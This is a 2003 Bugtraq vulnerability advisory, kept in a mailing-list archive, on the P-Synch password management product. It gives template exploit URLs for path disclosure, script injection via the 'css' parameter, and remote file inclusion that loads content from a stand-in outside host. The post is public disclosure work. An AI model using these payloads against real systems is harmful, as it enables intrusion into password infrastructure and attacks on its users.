| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: 29 May 2003 05:26:21 -0000 From: JeiAr <jeiar@...ms.com> To: bugtraq@...urityfocus.com Subject: Multiple Vulnerabilities In P-Synch Password Management Multiple Vulnerabilities In P-Synch Password Management ------------------------------------------------------- The other night I came across a server running P-Synch. I had never heard of it so i was curious to poke around on it a bit. Within an hour i found the vulns listed below. Im pretty sure there are other more serious vulns in P-Synch, but they are very picky about who they give thier software to, even an evaluation version. So was not able to test any further. However i encourage any admins running P-Synch to poke around on it, just to be on the safe side. Description ------------------------------------------------------- P-Synch Total Password Management Solution by M-TECH P-Synch is a total password management solution. It is intended to reduce the cost of ownership of password systems, and simultaneously improve the security of password protected systems. This is done through: -Password Synchronization. -Enforcing an enterprise wide password strength policy. -Allowing authenticated users to reset their own forgotten passwords and enable their locked out accounts. -Streamlining help desk call resolution for password resets. P-Synch is available for both internal use, on the corporate Intranet, as well as for the Internet deployment in B2B and B2C applications. http://www.securityfocus.com/products/837 Problems ------------------------------------------------------- All of these problems are simple, self explanatory vulns so, i'm sure the below examples will speak for themselves. Once again this application was NOT thoroughly researced. So anyone with a copy of P-Synch might wanna explore it further. Path Disclosure Vulnerability ------------------------------------------------------- https://path/to/psynch/nph-psa.exe?lang= https://path/to/psynch/nph-psf.exe?lang= Code Injection Vulnerability ------------------------------------------------------- https://path/to/psynch/nph-psf.exe?css=">[VBScript, JScript etc] https://path/to/psynch/nph-psa.exe?css=">[VBScript, JScript etc] File Include Vulnerability ------------------------------------------------------- https://path/to/psynch/nph-psf.exe?css=http://somesite/file https://path/to/psynch/nph-psa.exe?css=http://somesite/file Credits ------------------------------------------------------- All credits go to JeiAr of GulfTech Computers and CSA Security Research http://www.gulftech.org
Powered by blists - more mailing lists